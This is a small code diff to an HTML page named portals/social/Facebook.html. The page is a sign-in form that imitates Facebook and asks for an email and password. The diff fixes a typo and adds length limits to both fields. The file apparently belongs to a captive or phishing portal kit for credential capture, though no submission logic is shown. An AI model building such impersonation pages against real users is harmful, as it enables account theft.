--- a/portals/social/Facebook.html
+++ b/portals/social/Facebook.html
@@ -94,9 +94,9 @@
             <h1>Sign in</h1>
             <h2>Use your Facebook Account</h2>
             <label for="email"><b>Email</b></label>
-            <input type="text" placeholder="Enter Email" id="email" name="email" equired>
+            <input type="text" placeholder="Enter Email" id="email" name="email" maxlength="100" required>
             <label for="password"><b>Password</b></label>
-            <input type="password" placeholder="Enter Password" id="password" name="password" required>
+            <input type="password" placeholder="Enter Password" id="password" name="password" maxlength="100" required>
             <button type="submit">Sign in</button>
         </form>
         <div id="errorMessage" class="error-message"></div>
